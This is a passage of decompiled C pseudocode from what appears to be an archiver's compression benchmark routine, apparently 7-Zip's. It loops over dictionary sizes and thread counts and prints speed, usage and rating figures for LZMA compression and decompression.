																									 *((intOrPtr*)(_t1717 + _t1149)) = 0;
																									( &(4[_t1149]))[_t1717] = 0;
																									 *_t1149 = 0;
																									4[_t1149] = 0;
																									_t1149 = _t1149 + 8;
																									_t2107 = _t2107 - 1;
																									__eflags = _t2107;
																								} while (_t2107 != 0);
																								goto L396;
																							} else {
																								goto L385;
																							}
																							do {
																								L385:
																								E003EF23F(_t2139 - 0x40);
																								 *(_t2139 - 0x3c) =  *(_t2139 - 0x3c) + 1;
																								 *( *((intOrPtr*)(_t2139 - 0x40)) +  *(_t2139 - 0x3c) * 4) = _t2078;
																								_t2116 =  *(_t2139 - 0x4c) >> 1;
																								_t1247 = _t2078 + _t2078;
																								__eflags = _t2116 - _t2078;
																								 *(_t2139 + 0x10) = _t1247;
																								if(_t2116 > _t2078) {
																									__eflags = _t2116 - _t1247;
																									if(_t2116 < _t1247) {
																										E003EF23F(_t2139 - 0x40);
																										_t846 = _t2139 - 0x3c;
																										 *_t846 =  *(_t2139 - 0x3c) + 1;
																										__eflags =  *_t846;
																										 *( *((intOrPtr*)(_t2139 - 0x40)) +  *(_t2139 - 0x3c) * 4) = _t2116;
																									}
																								}
																								_t2117 =  *(_t2139 - 0x4c);
																								__eflags = _t2117 - _t2078;
																								if(_t2117 > _t2078) {
																									__eflags = _t2117 -  *(_t2139 + 0x10);
																									if(_t2117 <  *(_t2139 + 0x10)) {
																										E003EF23F(_t2139 - 0x40);
																										_t855 = _t2139 - 0x3c;
																										 *_t855 =  *(_t2139 - 0x3c) + 1;
																										__eflags =  *_t855;
																										 *( *((intOrPtr*)(_t2139 - 0x40)) +  *(_t2139 - 0x3c) * 4) = _t2117;
																									}
																								}
																								_t2078 =  *(_t2139 + 0x10);
																								__eflags = _t2078 -  *(_t2139 - 0x4c);
																							} while (_t2078 <=  *(_t2139 - 0x4c));
																							_t1146 =  *(_t2139 - 0x3c);
																							goto L393;
																						}
																						_t1252 =  *(_t2139 - 0x2c);
																						_t2105 = _t1252 + 0x100000;
																						asm("adc edi, edi");
																						__eflags =  *(_t2139 - 0xf4);
																						if(__eflags < 0) {
																							L381:
																							__eflags =  *(_t2139 + 0x17);
																							if( *(_t2139 + 0x17) != 0) {
																								 *(_t2139 + 0x10) =  *(_t2139 + 0x10) & 0x00000000;
																								_t1253 = 1;
																								__eflags =  *(_t2139 - 0x4c) - _t1253;
																								if( *(_t2139 - 0x4c) != _t1253) {
																									 *(_t2139 + 0x10) = _t1253;
																								}
																							}
																							goto L384;
																						}
																						if(__eflags > 0) {
																							L380:
																							 *(_t2139 - 0x54) = _t1252;
																							__eflags = 0;
																							 *(_t2139 - 0x50) = 0;
																							goto L381;
																						}
																						__eflags = _t1658 - _t1252;
																						if(_t1658 <= _t1252) {
																							goto L381;
																						}
																						goto L380;
																					}
																				}
																				_t1135 = E003B1E40(_t1134,  *((intOrPtr*)(_t2139 - 0xbc)));
																				 *(_t2139 - 4) = 0x11;
																				E003B1E40(_t1135,  *(_t2139 - 0x28));
																				 *(_t2139 + 0x10) =  *(_t2139 + 0x10) + 1;
																				_t2076 = _t2076 + 0x18;
																				__eflags = _t2076 - 0x42aa2c;
																			} while (_t2076 < 0x42aa2c);
																			goto L376;
																		}
																		_t2119 = 0x42aa1c;
																		do {
																			_t744 = _t2119 + 8; // 0x42ab00
																			E003B26B2(_t2139 - 0x28,  *_t744);
																			 *(_t2139 - 4) = 0x12;
																			_t1262 = E003B2690(_t2139 - 0xbc);
																			 *(_t2139 - 4) = 0x13;
																			_t2088 = E003B222D(_t1262,  *(_t2139 - 0x28), 0x3a);
																			__eflags = _t2088;
																			if(_t2088 >= 0) {
																				_t753 =  &(( *(_t2139 - 0x28))[1]); // 0x1
																				E003B2711(_t2139 - 0xbc,  &(_t753[_t2088]));
																				__eflags = _t2088 -  *(_t2139 - 0x24);
																				if(_t2088 <  *(_t2139 - 0x24)) {
																					_t1270 =  *(_t2139 - 0x28);
																					 *(_t2139 - 0x24) = _t2088;
																					_t757 =  &(_t1270[_t2088]);
																					 *_t757 = _t1270[_t2088] & 0x00000000;
																					__eflags =  *_t757;
																				}
																			}
																			_t1264 = L003CE7B9( *(_t2139 - 0x28),  *((intOrPtr*)(_t2139 - 0xe4)));
																			__eflags = _t1264;
																			if(_t1264 != 0) {
																				_t1264 = E003B2407( *((intOrPtr*)(_t2139 - 0xd8)),  *((intOrPtr*)(_t2139 - 0xbc)));
																				 *((intOrPtr*)(_t2139 - 0xc4)) =  *_t2119;
																				_t764 = _t2119 + 4; // 0x42aa20
																				__eflags = _t1264;
																				 *(_t2139 - 0xcc) = _t764;
																				if(_t1264 != 0) {
																					_t1255 = E003B1E40(_t1264,  *((intOrPtr*)(_t2139 - 0xbc)));
																					_push( *(_t2139 - 0x28));
																					 *(_t2139 - 4) = 0x11;
																					goto L375;
																				}
																			}
																			_t1265 = E003B1E40(_t1264,  *((intOrPtr*)(_t2139 - 0xbc)));
																			 *(_t2139 - 4) = 0x11;
																			E003B1E40(_t1265,  *(_t2139 - 0x28));
																			_t2119 = _t2119 + 0x10;
																			__eflags = _t2119 - 0x42aaac;
																		} while (_t2119 < 0x42aaac);
																		goto L376;
																	}
																	if(__eflags > 0) {
																		L353:
																		 *(_t2139 - 0xf8) = _t1272;
																		 *(_t2139 - 0xf4) = 0;
																		goto L354;
																	}
																	__eflags =  *(_t2139 - 0xf8) - _t1272;
																	if( *(_t2139 - 0xf8) <= _t1272) {
																		goto L354;
																	}
																	goto L353;
																}
																 *(_t2139 - 0xf8) = _t1272;
																 *(_t2139 - 0xf4) = 0;
															}
															goto L354;
														}
														_t2101 = 1;
														goto L479;
													} else {
														__eflags = _t2075 - 0xffffffff;
														if(_t2075 != 0xffffffff) {
															goto L343;
														}
														 *(_t2139 - 0x14) =  *(_t2139 - 0x14) & 0x00000000;
														 *(_t2139 - 0xf) =  *(_t2139 - 0xf) & 0x00000000;
														_t1273 = E003B23C9( *((intOrPtr*)(_t2139 - 0xe4)), "hash");
														__eflags = _t1273;
														if(_t1273 == 0) {
															_t2004 = 0x2a;
															_t1274 = E003B222D(_t1273,  *((intOrPtr*)(_t2139 - 0xe4)), 0x2a);
															__eflags = _t1274;
															if(_t1274 < 0) {
																L192:
																 *(_t2139 - 0x18) = 0;
																do {
																	__eflags =  *(_t2139 - 0x6d);
																	 *(_t2139 - 0x44) =  *(_t2139 - 0x4c);
																	if( *(_t2139 - 0x6d) != 0) {
																		__eflags =  *(_t2139 - 0x18);
																		 *(_t2139 - 0x44) = 1;
																		if( *(_t2139 - 0x18) == 0) {
																			L204:
																			__eflags =  *(_t2139 + 0xb);
																			if( *(_t2139 + 0xb) != 0) {
																				L215:
																				__eflags =  *(_t2139 - 0xf);
																				if(__eflags == 0) {
																					L217:
																					_t2004 =  *(_t2139 - 0x84);
																					_t1276 = L003C9787( *(_t2139 - 0x44),  *(_t2139 - 0x84), __eflags,  *(_t2139 - 0x68),  *(_t2139 - 0x64),  *(_t2139 - 0x14));
																					L218:
																					E003CE7BE( *(_t2139 - 0x44), _t1276, _t2004);
																					( *_t1635)[4]();
																					( *_t1635)[4]();
																					__eflags =  *(_t2139 - 0x14);
																					if( *(_t2139 - 0x14) == 0) {
																						 *(_t2139 - 0x2c4) = 4;
																						 *(_t2139 - 0xd) = 1;
																					} else {
																						 *(_t2139 - 0xd) =  *(_t2139 - 0xd) & 0x00000000;
																						 *(_t2139 - 0x2c4) = 0xc;
																					}
																					_t1282 =  *(_t2139 - 0xd);
																					 *(_t2139 + 0x17) =  *(_t2139 + 0x17) & 0x00000000;
																					_t2120 = 0;
																					__eflags =  *(_t2139 - 0x14);
																					 *((char*)(_t2139 - 0x2c7)) = _t1282;
																					 *(_t2139 - 0x5c) = 0;
																					 *(_t2139 - 0x58) = 0;
																					if( *(_t2139 - 0x14) != 0) {
																						 *(_t2139 + 0x17) = 1;
																					}
																					__eflags =  *(_t2139 + 0x17);
																					 *(_t2139 - 0x6c) = 0x1e;
																					if( *(_t2139 + 0x17) != 0) {
																						 *(_t2139 - 0x6c) = 0x2a;
																					}
																					__eflags = _t1282;
																					if(_t1282 != 0) {
																						E003CA10C( *(_t2139 - 0x2c4));
																						L003CDD51(_t1635, "Compressing",  *(_t2139 - 0x6c));
																						 *( *_t1635)( *0x42aaa8);
																						L003CDD51(_t1635, "Decompressing",  *(_t2139 - 0x6c));
																					}
																					( *_t1635)[4]();
																					__eflags =  *(_t2139 - 0x14);
																					_t2006 = "Method";
																					if( *(_t2139 - 0x14) == 0) {
																						_t2006 = "Dict";
																					}
																					L003CDD23(_t1635, _t2006,  *(_t2139 - 0x2c4));
																					_t2089 = 6;
																					do {
																						L003CDD51(_t1635, "Speed", 0xa);
																						L003CDD51(_t1635, "Usage", _t2089);
																						L003CDD51(_t1635, "R/U", 7);
																						L003CDD51(_t1635, "Rating", 7);
																						__eflags =  *(_t2139 + 0x17);
																						if( *(_t2139 + 0x17) != 0) {
																							L003CDD51(_t1635, "E/U", _t2089);
																							L003CDD51(_t1635, "Effec", _t2089);
																						}
																						__eflags =  *(_t2139 - 0xd);
																						if( *(_t2139 - 0xd) == 0) {
																							break;
																						}
																						__eflags = _t2120;
																						if(_t2120 == 0) {
																							 *( *_t1635)( *0x42aaa8);
																						}
																						_t2120 = _t2120 + 1;
																						__eflags = _t2120 - 2;
																					} while (_t2120 < 2);
																					( *_t1635)[4]();
																					E003CA10C( *(_t2139 - 0x2c4));
																					_t479 = _t2139 - 0x1c;
																					 *_t479 =  *(_t2139 - 0x1c) & 0x00000000;
																					__eflags =  *_t479;
																					_t2121 = "%";
																					do {
																						L003CDD51(_t1635, "KiB/s", 0xa);
																						L003CDD51(_t1635, _t2121, _t2089);
																						L003CDD51(_t1635, 0x429610, 7);
																						L003CDD51(_t1635, 0x429610, 7);
																						__eflags =  *(_t2139 + 0x17);
																						if( *(_t2139 + 0x17) != 0) {
																							L003CDD51(_t1635, _t2121, _t2089);
																							L003CDD51(_t1635, _t2121, _t2089);
																						}
																						__eflags =  *(_t2139 - 0xd);
																						if( *(_t2139 - 0xd) == 0) {
																							break;
																						}
																						__eflags =  *(_t2139 - 0x1c);
																						if( *(_t2139 - 0x1c) == 0) {
																							 *( *_t1635)( *0x42aaa8);
																						}
																						 *(_t2139 - 0x1c) =  *(_t2139 - 0x1c) + 1;
																						__eflags =  *(_t2139 - 0x1c) - 2;
																					} while ( *(_t2139 - 0x1c) < 2);
																					( *_t1635)[4]();
																					( *_t1635)[4]();
																					_t1301 =  *(_t2139 - 0x78);
																					_t1762 =  *(_t2139 - 0x74);
																					__eflags = _t1301 | _t1762;
																					if((_t1301 | _t1762) != 0) {
																						 *(_t2139 - 0x5c) = _t1301;
																						 *(_t2139 - 0x58) = _t1762;
																					}
																					__eflags =  *(_t2139 - 0x14);
																					if( *(_t2139 - 0x14) == 0) {
																						_t1302 = E003B23C9( *((intOrPtr*)(_t2139 - 0xe4)), "LZMA");
																						__eflags = _t1302;
																						if(_t1302 != 0) {
																							L296:
																							L003C7B30(_t1302, _t2139 - 0x2a0);
																							L297:
																							_t1304 = 0x12;
																							__eflags =  *(_t2139 - 0x94) - _t1304;
																							if( *(_t2139 - 0x94) < _t1304) {
																								 *(_t2139 - 0x94) = _t1304;
																							}
																							 *(_t2139 - 0x1c) =  *(_t2139 - 0x1c) & 0x00000000;
																							__eflags =  *(_t2139 + 0xc);
																							if( *(_t2139 + 0xc) > 0) {
																								do {
																									_t2125 =  *(_t2139 - 0x94);
																									_t1332 = 1;
																									_t1333 = E0041F4F0(_t1332, _t2125, 0);
																									__eflags =  *(_t2139 - 0x64);
																									if(__eflags > 0) {
																										L304:
																										__eflags =  *(_t2139 + 0x10);
																										if( *(_t2139 + 0x10) == 0) {
																											_t2125 = 0x20;
																										}
																										_t1334 = 1;
																										_t1335 = E0041F4F0(_t1334, _t2125, 0);
																										__eflags = 0 -  *(_t2139 - 0x64);
																										if(__eflags < 0) {
																											L312:
																											_t1336 = 1;
																											_t1337 = E0041F4F0(_t1336, _t2125, 0);
																											_t2094 = 0;
																											 *(_t2139 - 0x54) = _t1337;
																											__eflags = 0 -  *(_t2139 - 0x64);
																											if(__eflags > 0) {
																												goto L331;
																											}
																											if(__eflags < 0) {
																												do {
																													L315:
																													E003CE7E5(_t1635, _t2125, __eflags);
																													 *(_t2139 - 0x2ac) =  *(_t2139 - 0x54);
																													_push(_t2139 - 0xf0);
																													 *((intOrPtr*)(_t2139 - 0x2a8)) = _t2094;
																													L003CD94B(_t2139 - 0x1cc, __eflags);
																													 *(_t2139 - 4) = 0x1e;
																													_t1343 = E003B23C9( *((intOrPtr*)(_t2139 - 0x1c0)), "LZMA");
																													__eflags = _t1343;
																													if(_t1343 == 0) {
																														L318:
																														__eflags =  *(_t2139 - 0xe);
																														if(__eflags == 0) {
																															_t1344 =  *(_t2139 - 0x2ac);
																															__eflags = _t1344 - _t1344;
																															_t2095 = _t1344;
																															if(_t1344 != _t1344) {
																																L340:
																																_t2086 = 0x8007000e;
																																L341:
																																 *(_t2139 - 4) = 0x11;
																																L003C9708(_t2139 - 0x1cc);
																																L00403D87(_t2139 - 0x11c);
																																L003C9701(_t2139 - 0x30);
																																L342:
																																 *(_t2139 - 4) =  *(_t2139 - 4) | 0xffffffff;
																																L003C9708(_t2139 - 0xf0);
																																_t1119 = _t2086;
																																goto L484;
																															}
																															__eflags = 0 -  *((intOrPtr*)(_t2139 - 0x2a8));
																															if(0 !=  *((intOrPtr*)(_t2139 - 0x2a8))) {
																																goto L340;
																															}
																															__eflags = _t1344 - 0x40000;
																															if(__eflags >= 0) {
																																_t2095 = _t1344 + 0x10000;
																															}
																															L325:
																															_t2086 = E003CCC1E(1,  *(_t2139 - 0x44), __eflags);
																															( *_t1635)[4]( *(_t2139 - 0x80),  *(_t2139 - 0x7c), _t2139 - 0x1a0, _t2139 - 0x1cc, _t2095, L00403A5D(_t2139 - 0x30), 0x20, _t1635, _t2139 - 0x2cc, _t2139 - 0x2a0);
																															__eflags = _t2086;
																															if(_t2086 != 0) {
																																goto L341;
																															}
																															__eflags =  *(_t2139 + 0x10);
																															 *(_t2139 - 4) = 0x11;
																															_t1804 = _t2139 - 0x1cc;
																															if( *(_t2139 + 0x10) == 0) {
																																L003C9708(_t1804);
																																goto L331;
																															}
																															goto L327;
																														}
																														_t2095 = L00403A60(_t2139 - 0x30);
																														goto L325;
																													}
																													 *(_t2139 - 0xbe) =  *(_t2139 - 0xbe) & 0x00000000;
																													 *((short*)(_t2139 - 0xc0)) = 0x13;
																													 *(_t2139 - 0xb8) = _t2125;
																													 *(_t2139 - 4) = 0x1f;
																													_t1362 = E003B2DCD(_t2139 - 0x184, "d");
																													 *(_t2139 - 4) = 0x20;
																													_push(_t2139 - 0xc0);
																													_push(_t1362);
																													_t2086 = L003BDE7C(_t2139 - 0x1cc);
																													E003B1E40(_t1363,  *((intOrPtr*)(_t2139 - 0x184)));
																													__eflags = _t2086;
																													if(_t2086 != 0) {
																														E003B92C9(_t2139 - 0xc0);
																														goto L341;
																													}
																													 *(_t2139 - 4) = 0x1e;
																													E003B92C9(_t2139 - 0xc0);
																													goto L318;
																													L327:
																													L003C9708(_t1804);
																													_t2125 = _t2125 + 1;
																													_t1358 = 1;
																													_t1359 = E0041F4F0(_t1358, _t2125, 0);
																													_t2094 = 0;
																													 *(_t2139 - 0x54) = _t1359;
																													__eflags = 0 -  *(_t2139 - 0x64);
																												} while (__eflags < 0);
																												if(__eflags > 0) {
																													goto L331;
																												}
																											}
																											__eflags =  *(_t2139 - 0x54) -  *(_t2139 - 0x68);
																											if(__eflags > 0) {
																												goto L331;
																											}
																											goto L315;
																										} else {
																											if(__eflags > 0) {
																												while(1) {
																													L309:
																													__eflags = _t2125;
																													if(_t2125 <= 0) {
																														goto L312;
																													}
																													_t2125 = _t2125 - 1;
																													_t1367 = 1;
																													_t1335 = E0041F4F0(_t1367, _t2125, 0);
																													__eflags = 0 -  *(_t2139 - 0x64);
																													if(__eflags > 0) {
																														continue;
																													}
																													if(__eflags >= 0) {
																														goto L308;
																													}
																													goto L312;
																												}
																												goto L312;
																											}
																											L308:
																											__eflags = _t1335 -  *(_t2139 - 0x68);
																											if(_t1335 <=  *(_t2139 - 0x68)) {
																												goto L312;
																											}
																											goto L309;
																										}
																									}
																									if(__eflags < 0) {
																										L303:
																										_t2125 = 0x12;
																										goto L304;
																									}
																									__eflags =  *(_t2139 - 0x68) - _t1333;
																									if( *(_t2139 - 0x68) >= _t1333) {
																										goto L304;
																									}
																									goto L303;
																									L331:
																									 *(_t2139 - 0x1c) =  *(_t2139 - 0x1c) + 1;
																									__eflags =  *(_t2139 - 0x1c) -  *(_t2139 + 0xc);
																								} while ( *(_t2139 - 0x1c) <  *(_t2139 + 0xc));
																							}
																							goto L332;
																						}
																						_t2096 = 0x42a820;
																						do {
																							_t584 = _t2096 + 0x14; // 0x42abd8
																							E003B26B2(_t2139 - 0x40,  *_t584);
																							 *(_t2139 - 4) = 0x1c;
																							_t1369 = E003B2690(_t2139 - 0x28);
																							 *(_t2139 - 4) = 0x1d;
																							_t2126 = E003B222D(_t1369,  *((intOrPtr*)(_t2139 - 0x40)), 0x3a);
																							__eflags = _t2126;
																							if(_t2126 >= 0) {
																								_t593 =  *((intOrPtr*)(_t2139 - 0x40)) + 1; // 0x1
																								E003B2711(_t2139 - 0x28, _t2126 + _t593);
																								__eflags = _t2126 -  *(_t2139 - 0x3c);
																								if(_t2126 <  *(_t2139 - 0x3c)) {
																									_t1384 =  *((intOrPtr*)(_t2139 - 0x40));
																									 *(_t2139 - 0x3c) = _t2126;
																									_t597 = _t2126 + _t1384;
																									 *_t597 =  *(_t2126 + _t1384) & 0x00000000;
																									__eflags =  *_t597;
																								}
																							}
																							_t1371 = L003CE7B9( *((intOrPtr*)(_t2139 - 0x40)),  *((intOrPtr*)(_t2139 - 0xe4)));
																							__eflags = _t1371;
																							if(_t1371 != 0) {
																								__eflags =  *(_t2139 - 0x24);
																								if( *(_t2139 - 0x24) == 0) {
																									L320:
																									_t648 = _t2096 + 8; // 0x168
																									 *(_t2139 - 0x29c) =  *_t648;
																									_t651 = _t2096 + 0xc; // 0x91
																									 *(_t2139 - 0x298) =  *_t651;
																									_t653 = _t2096 + 0x10; // 0x14
																									 *(_t2139 - 0x294) =  *_t653;
																									_t1376 = E003B1E40( *_t653,  *(_t2139 - 0x28));
																									 *(_t2139 - 4) = 0x11;
																									E003B1E40(_t1376,  *((intOrPtr*)(_t2139 - 0x40)));
																									goto L297;
																								}
																								_t1378 = strcmp( *(_t2139 - 0x28), "x5");
																								asm("sbb al, al");
																								_t1380 =  ~_t1378 + 1;
																								__eflags = _t1380;
																								 *(_t2139 - 0x6f) = _t1380;
																								if(_t1380 == 0) {
																									L294:
																									_t1371 = E003B2357(_t2139 - 0xd8,  *(_t2139 - 0x28));
																									__eflags = _t1371;
																									if(_t1371 != 0) {
																										goto L320;
																									}
																									goto L295;
																								}
																								__eflags =  *(_t2139 - 0xd4);
																								if( *(_t2139 - 0xd4) == 0) {
																									goto L320;
																								}
																								goto L294;
																							}
																							L295:
																							_t1372 = E003B1E40(_t1371,  *(_t2139 - 0x28));
																							 *(_t2139 - 4) = 0x11;
																							_t1302 = E003B1E40(_t1372,  *((intOrPtr*)(_t2139 - 0x40)));
																							_t2096 = _t2096 + 0x18;
																							__eflags = _t2096 - 0x42aa18;
																						} while (_t2096 < 0x42aa18);
																						goto L296;
																					} else {
																						 *(_t2139 - 0x1c) =  *(_t2139 - 0x1c) & 0x00000000;
																						__eflags =  *(_t2139 + 0xc);
																						if( *(_t2139 + 0xc) <= 0) {
																							goto L332;
																						} else {
																							goto L247;
																						}
																						do {
																							L247:
																							_t2097 = 0;
																							__eflags =  *(_t2139 - 0x1c);
																							if( *(_t2139 - 0x1c) != 0) {
																								( *_t1635)[4]();
																							}
																							do {
																								L003CDD23(_t1635, "CPU", 0xc);
																								__eflags = _t2097 - 2;
																								 *(_t2139 - 0x178) =  *(_t2139 - 0x80);
																								 *(_t2139 - 0x174) =  *(_t2139 - 0x7c);
																								 *(_t2139 - 0x170) =  *(_t2139 - 0x44);
																								if(_t2097 == 2) {
																									L252:
																									 *(_t2139 - 0x16c) = 1;
																									L253:
																									 *(_t2139 - 0x168) =  *(_t2139 - 0x78);
																									 *(_t2139 - 0x164) =  *(_t2139 - 0x74);
																									_push(_t2139 - 0x1a0);
																									_push(_t1635);
																									_t2101 = E003CA39F(_t2139 - 0x178, _t2149);
																									__eflags = _t2101;
																									if(_t2101 != 0) {
																										goto L479;
																									}
																									goto L254;
																								}
																								__eflags =  *(_t2139 - 0x78) |  *(_t2139 - 0x74);
																								if(( *(_t2139 - 0x78) |  *(_t2139 - 0x74)) != 0) {
																									goto L252;
																								}
																								 *(_t2139 - 0x16c) =  *(_t2139 - 0x16c) & 0x00000000;
																								goto L253;
																								L254:
																								 *(_t2139 - 0x5c) =  *(_t2139 - 0x160);
																								 *(_t2139 - 0x58) =  *(_t2139 - 0x15c);
																								E003CA397();
																								_t1394 =  *(_t2139 - 0x78);
																								_t1829 =  *(_t2139 - 0x74);
																								__eflags = _t1394 | _t1829;
																								if((_t1394 | _t1829) != 0) {
																									 *(_t2139 - 0x5c) = _t1394;
																									 *(_t2139 - 0x58) = _t1829;
																								}
																								_t2097 = _t2097 + 1;
																								__eflags = _t2097 - 3;
																							} while (_t2097 < 3);
																							E003CA397();
																							L003C9F5C(_t2139 - 0x2cc, 1,  *(_t2139 - 0x5c),  *(_t2139 - 0x58));
																							__eflags =  *(_t2139 - 0xf);
																							if( *(_t2139 - 0xf) != 0) {
																								L269:
																								__eflags =  *(_t2139 + 0xb);
																								_t2127 =  *(_t2139 - 0x68);
																								_t1396 = 0x20000;
																								if( *(_t2139 + 0xb) == 0) {
																									L272:
																									__eflags =  *(_t2139 - 0xe);
																									if( *(_t2139 - 0xe) == 0) {
																										L278:
																										_push( *(_t2139 - 0x58));
																										_t2128 =  *(_t2139 - 0x44);
																										_push( *(_t2139 - 0x5c));
																										_push(1);
																										_push(_t2139 - 0x28c);
																										_push(_t2139 - 0x1a0);
																										_push(_t2139 - 0x2cc);
																										_push(_t1635);
																										_push( *(_t2139 - 0x30));
																										_push(_t1396);
																										_push( *(_t2139 - 0x7c));
																										_push( *(_t2139 - 0x80));
																										_t1127 = E003CE622(_t2139 - 0xf0, _t2128, _t2149);
																										__eflags = _t1127;
																										if(_t1127 != 0) {
																											goto L176;
																										}
																										E003CA397();
																										L003CDD23(_t1635, "CPU", 0xc);
																										_t1838 =  *(_t2139 - 0x74);
																										 *(_t2139 - 0x2fc) =  *(_t2139 - 0x80);
																										 *(_t2139 - 0x2f8) =  *(_t2139 - 0x7c);
																										_t1400 =  *(_t2139 - 0x78);
																										 *(_t2139 - 0x2f4) = _t2128;
																										__eflags = _t1400 | _t1838;
																										if((_t1400 | _t1838) == 0) {
																											_t572 = _t2139 - 0x2f0;
																											 *_t572 =  *(_t2139 - 0x2f0) & 0x00000000;
																											__eflags =  *_t572;
																										} else {
																											 *(_t2139 - 0x2f0) = 1;
																										}
																										 *(_t2139 - 0x2ec) = _t1400;
																										 *(_t2139 - 0x2e8) = _t1838;
																										_push(_t2139 - 0x1a0);
																										_push(_t1635);
																										_t2101 = E003CA39F(_t2139 - 0x2fc, _t2149);
																										__eflags = _t2101;
																										if(_t2101 != 0) {
																											goto L479;
																										} else {
																											goto L283;
																										}
																									}
																									__eflags =  *(_t2139 + 0xb);
																									_t1396 =  *(_t2139 - 0x2c);
																									if( *(_t2139 + 0xb) == 0) {
																										goto L278;
																									}
																									__eflags = 0 -  *(_t2139 - 0x64);
																									if(__eflags < 0) {
																										goto L278;
																									}
																									if(__eflags > 0) {
																										L277:
																										_t1396 = _t2127;
																										goto L278;
																									}
																									__eflags = _t1396 - _t2127;
																									if(_t1396 <= _t2127) {
																										goto L278;
																									}
																									goto L277;
																								}
																								__eflags = _t2127 - _t2127;
																								_t1127 = _t2127;
																								if(_t2127 != _t2127) {
																									L338:
																									_t2101 = 0x8007000e;
																									goto L479;
																								}
																								__eflags = 0 -  *(_t2139 - 0x64);
																								if(0 !=  *(_t2139 - 0x64)) {
																									goto L338;
																								}
																								goto L272;
																							}
																							__eflags =  *(_t2139 - 0xe);
																							_t1844 =  *(_t2139 - 0x68);
																							if( *(_t2139 - 0xe) == 0) {
																								L264:
																								__eflags =  *(_t2139 + 0xb);
																								if( *(_t2139 + 0xb) != 0) {
																									L267:
																									_push(1);
																									_pop(0);
																									L268:
																									_push(_t2139 - 0x2cc);
																									_push(_t1635);
																									_push( *(_t2139 - 0x30));
																									_push(_t1844);
																									_push(0);
																									_push(_t2139 - 0x1a0);
																									_push( *(_t2139 - 0x7c));
																									_push( *(_t2139 - 0x80));
																									_t1127 = L003CDD81(_t2139 - 0xf0,  *(_t2139 - 0x44));
																									__eflags = _t1127;
																									if(_t1127 != 0) {
																										goto L176;
																									}
																									goto L269;
																								}
																								L265:
																								__eflags =  *(_t2139 - 0xe);
																								if( *(_t2139 - 0xe) != 0) {
																									goto L267;
																								}
																								goto L268;
																							}
																							__eflags =  *(_t2139 + 0xb);
																							_t1844 =  *(_t2139 - 0x2c);
																							if( *(_t2139 + 0xb) == 0) {
																								goto L265;
																							}
																							__eflags = 0 -  *(_t2139 - 0x64);
																							if(__eflags < 0) {
																								goto L264;
																							}
																							if(__eflags > 0) {
																								L263:
																								_t1844 =  *(_t2139 - 0x68);
																								goto L264;
																							}
																							__eflags = _t1844 -  *(_t2139 - 0x68);
																							if(_t1844 <=  *(_t2139 - 0x68)) {
																								goto L264;
																							}
																							goto L263;
																							L283:
																							E003CA397();
																							 *(_t2139 - 0x1c) =  *(_t2139 - 0x1c) + 1;
																							__eflags =  *(_t2139 - 0x1c) -  *(_t2139 + 0xc);
																						} while ( *(_t2139 - 0x1c) <  *(_t2139 + 0xc));
																						goto L332;
																					}
																				}
																				L216:
																				_t1276 = L003CD9CD( *(_t2139 - 0x44), __eflags,  *(_t2139 - 0x68),  *(_t2139 - 0x64));
																				goto L218;
																			}
																			__eflags =  *(_t2139 - 0xf);
																			if(__eflags != 0) {
																				goto L216;
																			}
																			asm("sbb eax, eax");
																			__eflags =  *((char*)(_t2139 - 0xc4));
																			_t2093 =  ~( *(_t2139 - 0x14)) + 0x19;
																			_t2124 = _t2093;
																			if( *((char*)(_t2139 - 0xc4)) == 0) {
																				L212:
																				_t1426 = 1;
																				_t1427 = E0041F4F0(_t1426, _t2124, 0);
																				__eflags =  *(_t2139 - 0x14);
																				 *(_t2139 - 0x68) = _t1427;
																				 *(_t2139 - 0x64) = 0;
																				if(__eflags == 0) {
																					goto L217;
																				}
																				__eflags = _t2124 - _t2093;
																				if(__eflags == 0) {
																					goto L217;
																				}
																				 *( *_t1635)("Dictionary reduced to: ");
																				_t2004 = 1;
																				E003CA0A8(_t1635, _t2004, __eflags, _t2124, 0);
																				( *_t1635)[4]();
																				goto L215;
																			}
																			__eflags = _t2093 - 0x12;
																			if(_t2093 <= 0x12) {
																				goto L212;
																			} else {
																				goto L208;
																			}
																			while(1) {
																				L208:
																				_push( *(_t2139 - 0x14));
																				_t1433 = 1;
																				_t1434 = E0041F4F0(_t1433, _t2124, 0);
																				_push(0);
																				_t2023 =  *(_t2139 - 0x84);
																				_push(_t1434);
																				_t1436 = L003C9787( *(_t2139 - 0x44), _t2023, __eflags) + 0x800000;
																				asm("adc edx, 0x0");
																				__eflags = _t2023 -  *((intOrPtr*)(_t2139 - 0x134));
																				if(__eflags < 0) {
																					goto L212;
																				}
																				if(__eflags > 0) {
																					L211:
																					_t2124 = _t2124 - 1;
																					__eflags = _t2124 - 0x12;
																					if(_t2124 > 0x12) {
																						continue;
																					}
																					goto L212;
																				}
																				__eflags = _t1436 -  *((intOrPtr*)(_t2139 - 0x138));
																				if(_t1436 <=  *((intOrPtr*)(_t2139 - 0x138))) {
																					goto L212;
																				}
																				goto L211;
																			}
																			goto L212;
																		}
																		__eflags =  *(_t2139 - 0x34) - 2;
																		if( *(_t2139 - 0x34) < 2) {
																			break;
																		}
																		_t1437 =  *(_t2139 - 0x34);
																		__eflags =  *(_t2139 - 0x18) - 1;
																		 *(_t2139 - 0x44) = _t1437;
																		if( *(_t2139 - 0x18) != 1) {
																			__eflags = _t1437 - 4;
																			if(_t1437 < 4) {
																				break;
																			}
																			__eflags =  *(_t2139 - 0x18);
																			if( *(_t2139 - 0x18) <= 0) {
																				goto L204;
																			}
																			L203:
																			( *_t1635)[4]();
																			( *_t1635)[4]();
																			goto L204;
																		}
																		__eflags = _t1437 - 4;
																		if(_t1437 >= 4) {
																			 *(_t2139 - 0x44) = _t1437 >> 1;
																		}
																		goto L203;
																	}
																	__eflags =  *(_t2139 - 0x18);
																	if( *(_t2139 - 0x18) != 0) {
																		break;
																	}
																	goto L204;
																	L332:
																	_t2122 =  *(_t2139 - 0x6c);
																	E003CA115(_t1635, 0x2d,  &(( *(_t2139 - 0x2c4))[ *(_t2139 - 0x6c)]));
																	__eflags =  *(_t2139 - 0xd);
																	if( *(_t2139 - 0xd) != 0) {
																		 *( *_t1635)( *0x42aaa8);
																		E003CA115(_t1635, 0x2d, _t2122);
																	}
																	( *_t1635)[4]();
																	__eflags =  *(_t2139 - 0xd);
																	if( *(_t2139 - 0xd) != 0) {
																		L003CDD23(_t1635, "Avr:",  *(_t2139 - 0x2c4));
																		__eflags =  *(_t2139 - 0x14);
																		_t687 = _t2139 - 0xcc;
																		 *_t687 =  *(_t2139 - 0x14) == 0;
																		__eflags =  *_t687;
																		L003CDB40(_t1635,  *(_t2139 + 0x17),  *(_t2139 - 0x5c),  *(_t2139 - 0x58),  *(_t2139 - 0xcc), _t2139 - 0x28c);
